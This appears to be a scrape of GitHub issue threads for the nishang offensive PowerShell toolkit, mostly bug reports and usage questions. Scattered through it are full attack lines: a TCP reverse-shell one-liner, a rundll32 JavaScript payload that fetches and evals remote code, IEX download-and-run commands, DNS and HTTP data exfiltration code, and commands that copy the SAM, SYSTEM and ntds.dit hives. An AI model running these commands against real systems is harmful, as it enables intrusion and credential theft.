samratashok / nishang Goto Github PK

This is a relatively silly question, and I will try not to be like a dick.
I am a Chinese. I came across with nishang and liked it very much. My question is that what does the word nishang actually mean. In Chinese, there is a word "你上" with exactly the same pronunciation ("Nǐ Shàng" in Pinyin), which means "it's your turn and go ahead". I am wondering if there are any connections between these two words. Thanks very much!

Hi,

Been trying the below and can't seem to get it to work. Please can you advise. Thanks

There is a bug in the script due to which the output of the commands was not returned. In fact, the commands are not getting executed at all.

Thanks to Klimis Leonidas for reprting the bug on email.

Get-PassHashes does not work on Windows 10 1607. It always returns empty LM/NTLM hashes on execution.
I attached a screenshot that shows the problem on a test machine. On the left side is the output from Get-PassHashes, on the right side is the (correct) output from mimikatz.

Hi, I would like to ask if anyone knows how to upgrade the "Invoke-PowerShellTcpOneLine.ps1" reverse shell netcat session to a meterpreter shell session?

I have tried listening for the callback the your ps1 file using the msfconsole with different payloads like windows/x64/meterpreter/reverse_tcp. It detects the session and just dies. Does anyone know a workaround? Thank you

when running Get-LsaSecret I am getting this error on every secret name:
WARNING: lsaNtsStatusToWinError: 1305
Cannot convert null to type "LSAUtil.LSAUtil+LSA_UNICODE_STRING".
At C:\temp\get-lsasecret.ps1:214 char:101

•     [LSAUtil.LSAUtil+LSA_UNICODE_STRING][System.Runtime.InteropServices.marshal]::PtrToStructure <<<< ($privateData, [System.Type][LSAUtil.LSAUtil+LSA_UNICODE_STRING])
  

  • CategoryInfo : NotSpecified: (:) [], RuntimeException
  • FullyQualifiedErrorId : RuntimeException

Hello

While running apt-get update in Kali Linux I am receiving the below error for the package nishang:

Failed to fetch http://archive-9.kali.org/kali kali-rolling/main amd64 nishang all 0.7.6-0kali1_all.deb 403 Forbidden [IP: 167.114.191.148 80]

I have tried other mirrors but they all report the same above Forbidden error.

If this issue needs to be reported to Kali or the apt team please let me know and close this issue.

Thanks.

A user reported this problem over email. Trying to replicate the problem in my lab.

_DNS_TXT_Pwnage -StartDomain start.abc.com -cmdstring begincommands -CommandDomain command.abc.com -psstring startscript -PSDomain script.abc.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop
---> The above command gave me the list of process of infected machine.

However, when i started to use this command for exfiltrate the data, i got an error as "Can't find server address for 'DNS'"
_DNS_TXT_Pwnage -StartDomain start.abc.com -cmdstring begincommands -CommandDomain command.abc.com -psstring startscript -PSDomain script.abc.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop -exfil -ExfilOption DNS -DomainName abc.com

I created private nameservers, and changed the default nameservers of domain to ns1.abc.com and ns2.abc.com
This is the command that i ran, and the message is "Request to UnKnown timed-out"

DNS_TXT_Pwnage -AuthNS ns1.abc.com -StartDomain start.abc.com -cmdstring begincommands -CommandDomain command.abc.com -psstring startscript -PSDomain script.abc.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop -exfil -ExfilOption DNS -DomainName abc.com

Would anyone please tell me where i am wrong?

Do-exfiltration is unable to handle the pipeline input properly. It exfiltrates only the last object returned from the command. Currently, the pipeline should not be used with Do-Exfiltration, instead, use as below:

Do-Exfiltration -Data (Get-Process) -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php

This update affects the way how the encryption component of .NET sends and receives encrypted packets. It splits the first record after the handshake (1byte + remaining bytes). I was modifying my own scripts and was testing your Invoke-PoshRatHTTPs with them. I couldnt figure out why I was getting the packets split. I just had to change the protocol to TLS12 from TLS on your script and my own client.

More specific:
$SslStream.AuthenticateAsServer($SSLcertfake, $false, [System.Security.Authentication.SslProtocols]::Tls12, $false)

I figured I let you know so that the script is up to date, and help others with the same issue.

P.S. Amazing job and thank you for sharing your knowledge ! 👍

Reference:
https://support.microsoft.com/en-us/kb/3155464

Seems to be the same bug as - #6.

Word Version: Microsoft® Office 2010 (14.0.4762.1000) MSO (14.0.6112.5000)

c:\ >powershell -command "& { . .\Out-Word.ps1 ; Out-Word -WordFileDir templates -PayloadURL http://domain.com/psh }"
Exception setting "DisplayAlerts": "Cannot convert value "False" to type "Microsoft.Office.Interop.Word.WdAlertLevel".
Error: "Invalid cast from 'System.Boolean' to 'Microsoft.Office.Interop.Word.WdAlertLevel'.""
At C:\Users\nmonkee\Desktop\Out-Word.ps1:179 char:13

•         $Word.DisplayAlerts = $False
  

•         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : NotSpecified: (:) [], SetValueInvocationException
  • FullyQualifiedErrorId : ExceptionWhenSetting

On cmdkey /list is null ，The key logger can Record RDP voucher?

While using Powerpreter with HTTP-Backdoor, DNS_TXT_Pwnage and Execute-On-Time, an error is being thrown while using Exfiltration.

" does not belong to the set "gmail,pastebin,WebServer,DNS" specified by
the ValidateSet attribute. Supply an argument that is in the set and then
try the command again."

Reported by a user to me on email.

Hello,

so i'm trying to figure out why do i get "index was outside the bounds of the array" when trying to use out-word.ps1 with your tcp one liner reverse shell ? it's the same with local webserver when i try to import my own ps1 code e.g -PayloadURL http://x.x.x.x/test.ps1 still the same issue!

Do you still support it or abandoned ?

Thanks in advanced - e.g the keen student :)

Reported by Anonymous user on my blog:
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html?showComment=1425505599206#c811251326834686943

Hey! Awesome work! Love your blog and the awesome things you are doing in Powershell!

Just a quick fix on your code: In your code for "Out-Excel" and "powerpreter", when you create the variable $Payload for the -PayloadURL, you have the syntax in the code as:

objProcess.Create '$Payload', Null, objConfig, intProcessID

The Single quotes cause the payload to fail, so I change it to double quotes:

objProcess.Create "$Payload", Null, objConfig, intProcessID

and that worked perfectly! I just wanted to let you know. Keep up the awesome work!

Hello,
I didn't find any mention of the license for nishang. It would be good to specify the license in the readme and / or add a license file.
Thanks.

God I need help!
when trying the Out-CHM cilent , open the chm file generated , it will push the calc.exe(which i use to be the backdoor.exe) twice?

I noticed that when passing a path to the NTDS.dit file, using the ntdsSource argument, it fails when trying to copy from the shadow.

Take for instance the supplied example (https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1#L27):

Copy-VSS -DestinationDir C:\temp -ntdsSource D:\ntds\ntds.dit
                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

This fails with the following:

The filename, directory name, or volume label syntax is incorrect.

This due to the script first making a copy of the C drive (https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1#L53):

Get-WmiObject -list win32_shadowcopy).Create("C:\","ClientAccessible")

Then later, it tries to copy from the supplies ntdsSource (https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1#L70), which by using example above will look like this:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ID]\D:\ntds\ntds.dit
                                                        ^^^^^^^^^^^^^^^^

This fails because of two things:

• The supplied shadow copy is of the C drive
• The path passed to copy should not include drive letter

I guess there should be some check if the supplied ntdsSource is on the C drive, and if not, there needs to be taken a separate shadow copy of that. Further, the ntdsSource variable needs to be modified so the drive letter is removed, so that the command becomes:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ID]\ntds\ntds.dit

I ended up running the commands manually, which doesn't take much effort.

Just a heads up :-)

When using the Gmail option in the Do-Exfiltration function of Powerpreter it throws the following error:

Exception calling "Send" with "1" argument(s): "Failure sending mail."
At C:\ps\nishang\powerpreter\powerpreter.psm1:3899 char:19

•     $smtp.Send <<<< ($msg)
  

  • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
  • FullyQualifiedErrorId : DotNetMethodException

I get this error when using Do-Exfiltration with the Gmail option both with the pipeline and without it. The "Allow less secure apps" security option in gmail is checked.

These are the lines ive used:

Get-Information | Do-Exfiltration -ExfilOption gmail -username MyUsername -Password MyPassword

Do-Exfiltration -Data Get-Information -Exfiloption gmail -Username MyUsername -Password MyPassword

Tested on two VMs and two regular boxes (x64 and x86), all with the same result.

Is it possible to build a new release from the latest master?

I get this error when trying to run this, any suggestions? Im using it on VMWare Win10 (virtual machine). It actually downloads the .ps1 but it fails to run it.

Would it be a possible to incorporate a check for a POST variable matching a certain string and otherwise serve up a 404 error? Something similar to the following

<%--Antak - A Webshell which utilizes powershell.--%>

<script Language="c#" runat="server">
if (Request.Form["language"] != "whatever")
{
    context.Response.StatusCode = 404;
    context.Response.End();
    return;
}
else

{
 ...rest of code...
}

Hello, community!

PS write this error:

Import-Module : File C:\nishang\nishang.psm1 cannot be loaded because the execution of scripts is disabled on this system.

What will I do?

P.S. I use win7x64

Hello,
I'm submitting the idea of supporting "combo" wordlists for Invoke-BruteForce.ps1, where a combo file contains on each line a "login:password" entry.

Cheers!

I am getting a script error every time I run the macro produced from Out-Word -Payload 'rundll32.exe javascript:""..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");w=new%20ActiveXObject(""WScript.Shell"");try{v=w.RegRead(""HKCU\Software\Microsoft\Windows\CurrentVersion\Internet%20Settings\ProxyServer"");try{q=v.split(""="")[1].split("";"")[0];h.SetProxy(2,q);}catch(e){h.SetProxy(2,v);}}finally{h.Open(""GET"",""http://IP_Address_here:80/connect"",false);h.Send();B=h.ResponseText;eval(B)}'.

Once Enable Content is clicked the script error generates. Am i missing something in the syntax?

PS C:\Users\eMO\desktop> . ./Out-word.ps1
PS C:\Users\eMO\desktop> Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process" -RemainSafe
You cannot call a method on a null-valued expression.
At C:\Users\eMO\desktop\Out-Word.ps1:357 char:9

•     $DocModule = $Doc.VBProject.VBComponents.Item(1)
  

•     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At C:\Users\eMO\desktop\Out-Word.ps1:358 char:9

•     $DocModule.CodeModule.AddFromString($code_one)
  

•     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

Saved to file C:\Users\eMO\desktop\Salary_Details.doc
0
PS C:\Users\eMO\desktop>

There is an error when I run Copy-VSS, as the following picture

To fix this error, I tried to remove the backticks （`）in line 66,67,70,74

The modified code:

    cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $SAMpath
    cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SYSTEM" $SYSTEMpath
    if($ntdsSource)
    {
        cmd /c copy "$($volume.DeviceObject)\$ntdsSource\ntds.dit" $ntdspath
    }
    else
    {
        cmd /c copy "$($volume.DeviceObject)\windows\system32\ntds.dit" $ntdspath
    }

Run Copy-VSS after modification, It looks running correct.

Get-LSASecrets throws an error even when used with sufficient priviliges and 32-bit PowerShell.

"Exception calling "PtrToStructure" with "2" argument(s): "The specified structure must be blittable or have layout information."

Hello!

Im running into issues with outout ExetoText, maybe me i am doing something incorrectly!
PS C:\Users\Admin\Documents\WindowsPowerShell\Modules\nishang\Utility> .\ExetoText.ps1 C:\Users\Admin\Documents\WindowsP
owerShell\Modules\nishang\Utility\crss.exe C:\Users\Admin\Documents\WindowsPowerShell\Modules\nishang\Utility\crss.txt
PS C:\Users\Admin\Documents\WindowsPowerShell\Modules\nishang\Utility>

And there is no output!

A user, Peter, reported over email that Invoke-MimikatzWDigestDowngrade.ps1 is unable to lock a target machine. I was able to reproduce the bug. The user also suggested an improvement. I am currently testing it.

Im trying to import powerpreter from the file directory with Import-Module .\Powerpreter.psm1 but I get the error

At C:\users\desktop\desktop\nishang-master\powerpreter\Powerpreter.psm1:1 char:1

• <#
• ~~
  This script contains malicious content and has been blocked by your antivirus software.
  • CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
  • FullyQualifiedErrorId : ScriptContainedMaliciousContent

Import-Module : The specified module '.\Powerpreter.psm1' was not loaded because no valid module file was found in any module directory.
At line:1 char:1

• Import-Module .\Powerpreter.psm1

•   + CategoryInfo          : ResourceUnavailable: (.\Powerpreter.psm1:String) [Import-Module], FileNotFoundException
    + FullyQualifiedErrorId : Modules_ModuleNotFound,Microsoft.PowerShell.Commands.ImportModuleCommand
  
  
  
  
  

Im running as administrator and execution policy unrestricted and I have turned off AV

What can I be doing wrong?

Thanks

In Http-Backdoor, there is a -eq comparison with MagicString to determine if a file can be downloaded (Line 175 of commit f4d7fda). Most files when created automatically add whitespace chars at the end (e.g. tested in Linux) due to which a comparison may be very hard to get. Suggest removing trailing whitespace chars for testing.

$filecontent = $webclient.DownloadString("$CheckURL") $filecontent = $filecontent.TrimEnd() ##### Change here - trim the downloaded content ##### if($filecontent -eq $MagicString) { $script:pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)

Hi,
Amazing work on DNS_TXT_Pwnage !

I only want to execute a Get-Service command and exfil that result to pastebin.

Can you please tell me the correct command?

I have created a TXT record for start.mydomain.com with "begincommands"
I have created a TXT record for command.mydomain.com with "Get-Service"

I am importing the DNS_TXT_Pwnage.ps1 with Import-Module and then ....
DNS_TXT_Pwnage -StartDomain start.mydomain.com -cmdstring begincommands -CommandDomain command.mydomain.com -psstring startscript -PSDomain script.mydomain.com -Subdomains 2 -StopString stop -exfil -ExfilOption pastebin apikey username password.

The command get executed but i cannot exfil , also tried gmail.

Can you please help ?

A user Greg reported this on twitter
https://twitter.com/gregkcarson/status/623916646172786688

Greg is trying this on PowerShell v3. Information awaited.

https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1

when i run this command
Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

I get an error for /unprotect so mimikatz will not decrypt the chrome file.
What am doing wrong?

error
`Invoke-Mimikatz : A positional parameter cannot be found that accepts argument '/unprotect'.
At C:\Users\test\Desktop\mimikatz nishang\Invoke-Mimikatz.ps1:2754 char:1

• Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chr ...`

And if I run this command
Invoke-Mimikatz -Command '"dpapi::chrome /in:""%localappdata%\Google\Chrome\User Data\Default\Login Data"" /unprotect"'

I get this error
` mimikatz(powershell) # dpapi::chrome /in:
ERROR kuhl_m_dpapi_chrome ; Input 'Login Data' file needed (/in:"%localappdata%\Google\Chrome\User Data\Default\Login Data")

mimikatz(powershell) # %localappdata%\Google\Chrome\User Data\Default\Login Data"
ERROR mimikatz_doLocal ; "C:\Users\user4\AppData\Local\Google\Chrome\User" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

        exit  -  Quit mimikatz
         cls  -  Clear screen (doesn't work with redirections, like PsExec)
      answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
      coffee  -  Please, make me a coffee!
       sleep  -  Sleep an amount of milliseconds
         log  -  Log mimikatz input/output to file
      base64  -  Switch file input/output base64
     version  -  Display some version informations
          cd  -  Change or display current directory
   localtime  -  Displays system local date and time (OJ command)
    hostname  -  Displays system local hostname

mimikatz(powershell) # /unprotect
ERROR mimikatz_doLocal ; "/unprotect" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

        exit  -  Quit mimikatz
         cls  -  Clear screen (doesn't work with redirections, like PsExec)
      answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
      coffee  -  Please, make me a coffee!
       sleep  -  Sleep an amount of milliseconds
         log  -  Log mimikatz input/output to file
      base64  -  Switch file input/output base64
     version  -  Display some version informations
          cd  -  Change or display current directory
   localtime  -  Displays system local date and time (OJ command)
    hostname  -  Displays system local hostname`

good day i am new to this and following the proccess i am getting is error on all windows 7 or 8 pcs

PS C:> powershell "IEX (New-Object Net.WebClient).DownloadString('http://mywebserver/Invoke-PowerShellTcpOneLine.ps1
');"
IEX : At line:147 char:190

• ... ata-ga-click="(Logged out) Header, go to Features">Features <span cla ...

•                                                             ~
  

The '<' operator is reserved for future use.
At line:147 char:261

• ... ="Bump-link-symbol float-right text-normal text-gray-light">→</s ...

•                                                             ~
  

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:160 char:251

• ... ogged out) Header, go to Customer stories">Customer stories <span cla ...

•                                                             ~
  

The '<' operator is reserved for future use.
At line:160 char:322

• ... ="Bump-link-symbol float-right text-normal text-gray-light">→</s ...

•                                                             ~
  

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:161 char:231

• ... ata-ga-click="(Logged out) Header, go to Security">Security <span cla ...

•                                                             ~
  

The '<' operator is reserved for future use.
At line:161 char:302

• ... ="Bump-link-symbol float-right text-normal text-gray-light">→</s ...

•                                                             ~
  

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:181 char:223

• ... -click="(Logged out) Header, go to Features">Explore GitHub <span cla ...

•                                                             ~
  

The '<' operator is reserved for future use.
At line:181 char:294

• ... ="Bump-link-symbol float-right text-normal text-gray-light">→</s ...

•                                                             ~
  

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:184 char:102

• ... light text-normal text-mono f5 mb-2 border-top pt-3">Learn & con ...

•                                                             ~
  

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:217 char:185

• ... r" data-ga-click="(Logged out) Header, go to Pricing">Plans <span cla ...

•                                                             ~
  

The '<' operator is reserved for future use.
Not all parse errors were reported. Correct the reported errors and try again.
At line:1 char:1

• IEX (New-Object Net.WebClient).DownloadString('http://104.248.59.211/ ...

•   + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : RedirectionNotSupported,Microsoft.PowerShell.Commands.InvokeExpressionCommand
  
  
  
  
  

has anyone seen this

thanks

Both the payloads are currently unable to pull code/instruction if it is too long to fit in a single subdomain's TXT record.

Currently the download execute ps script overwrites the first downloaded script on every run. I would propose adding a filename randomization and overwrite checking function.

Reported on my blog as comment:

http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html?showComment=1417565010863#c4275766763153435120

I am currently looking in the issue, the solution proposed is:
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html?showComment=1417608458188#c7165076314488271651

Out-Word, namely "You cannot call a method on a null-valued expression":

Exception setting "DisplayAlerts": "Cannot convert value "False" to type "Micro
soft.Office.Interop.Word.WdAlertLevel". Error: "Invalid cast from 'System.Boole
an' to 'Microsoft.Office.Interop.Word.WdAlertLevel'.""
At C:\Users\test\Desktop\nishang\Client\Out-Word.ps1:127 char:11

• $Word. <<<< DisplayAlerts = $False
• CategoryInfo : InvalidOperation: (:) [], RuntimeException
• FullyQualifiedErrorId : PropertyAssignmentException

You cannot call a method on a null-valued expression.
At C:\Users\test\Desktop\nishang\Client\Out-Word.ps1:202 char:54

• $DocModule = $Doc.VBProject.VBComponents.Item <<<< (1)
• CategoryInfo : InvalidOperation: (Item:String) [], RuntimeExcep
  tion
• FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At C:\Users\test\Desktop\nishang\Client\Out-Word.ps1:203 char:44

• $DocModule.CodeModule.AddFromString <<<< ($code)
• CategoryInfo : InvalidOperation: (AddFromString:String) [], Run
  timeException
• FullyQualifiedErrorId : InvokeMethodOnNull

Argument: '1' should be a System.Management.Automation.PSReference. Use [ref].
At C:\Users\test\Desktop\nishang\Client\Out-Word.ps1:204 char:20

• $Doc.Saveas <<<< ($OutputFile, 0)
• CategoryInfo : NotSpecified: (:) [], MethodException
• FullyQualifiedErrorId : NonRefArgumentToRefParameterMsg

PS /home/ezri/htb> import-module ./nishang/nishang.psm1
Import-Module: /home/ezri/htb/nishang/nishang.psm1:24
Line |
24 | … )} | ForEach-Object {Import-Module $_.FullName -DisableNameChecking}
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| The script 'Add-ConstrainedDelegationBackdoor.ps1' cannot be run because the
| following modules that are specified by the "#requires" statements of the script are
| missing: ActiveDirectory.

Import-Module: /home/ezri/htb/nishang/nishang.psm1:24
Line |
24 | … )} | ForEach-Object {Import-Module $_.FullName -DisableNameChecking}
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| The script 'Add-ConstrainedDelegationBackdoor.ps1' cannot be run because the
| following modules that are specified by the "#requires" statements of the script are
| missing: ActiveDirectory.

WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb.
WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~
PS /home/ezri/htb>

It it replaced with something else or?

line 66 and line 67, copy SAM twice

    `cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $SAMpath`
    `cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $SYSTEMpath`

Copy-VSS cannot copy SYSTEM hive，I guess the line 67 should be

    `cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SYSTEM" $SYSTEMpath`

Raised by an anonymous user on my blog:
http://www.labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html?showComment=1425521883045#c1183207693915153071

Awesome work! I have a question on your HTTP-backdoor code execution. Maybe I'm reading into it or i'm missing something, so hopefully you can help me out.

When using the HTTP backdoor, how does the code execution actually work? I understand how it downloads the script, but giving that script a command..how does that work? For example:

I host powershellscript for your powerpreter on http://pastebin.com/powerpreter.psm1

I use the HTTP-backdoor with a magic string, and it goes to my pastebin and downloads the powerpreter. How do I give the powerpreter commands, like Get-Information? Until I give the stopstring, does the powerpreter run in the same powershell instance, or does it spawn a new one each time.

Hope this wasn't too confusing. Just asking for a bit of guidance! Thanks!

Out-Word and Out-Excel currently doesn't support longer payloads. This is required for using bigger PowerShell scripts as encoded payload.

Regarding DNS_TXT_Pwnage.ps1, using DNS exfiltration option :

{
    $lengthofsubstr = 0
    $code = Compress-Encode
    $queries = [int]($code.Length/63)
    while ($queries -ne 0)
    {
        $querystring = $code.Substring($lengthofsubstr,63)
        Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS"
        $lengthofsubstr += 63
        $queries -= 1
    }
    $mod = $code.Length%63
    $query = $code.Substring($code.Length - $mod, $mod)
    Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS"
}

The variable ($querystring) is base 64 encoded, it mean that it can contain uppercase caracters. However, nslookup command, or DNS queries in general are sent only on lowercase. In the DNS C2 side, we can't get all the information and the decompression routine will not work.

lately i have been getting this error when running the Tcp oneliner in Windows10

New-Object : Exception calling ".ctor" with "2" argument(s): "A socket operation was attempted to an unreachable
network 192.168.1.10:8888"
At line:2 char:11

• $client = New-Object System.Net.Sockets.TCPClient('192.168.1.10',8888);$s ...

•       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
  • FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand

You cannot call a method on a null-valued expression.
At line:2 char:68

• ... kets.TCPClient('192.168.1.10',8888);$stream = $client.GetStream();[byte[] ...

•                                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:2 char:136

• ... 65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) ...

•                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:2 char:484

• ... .Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

•                                                       ~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

Which is strange i usually dont have any problems during my tests any help would be Golden

The "Invoke-PowerShellTcpOneLine.ps1" reverse shell prints new lines between successive lines for, e.g. the ls command. I'm using netcat as the listener to which the shell connects.

I've looked at the code, and I can't seem to locate the issue:

#$client = New-Object System.Net.Sockets.TCPClient('192.168.254.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

How could it be fixed?

Furthermore, using commands like net users /domain only returns the "The request will be processed at a domain controller for domain..." intermediary response, and not the full response from the domain controller?

How do receive multiple connections when Invoke-JSRatRegsvr and client side code as a macro. I can get one connection at a time. Is there a command to back out of one connection to move to another?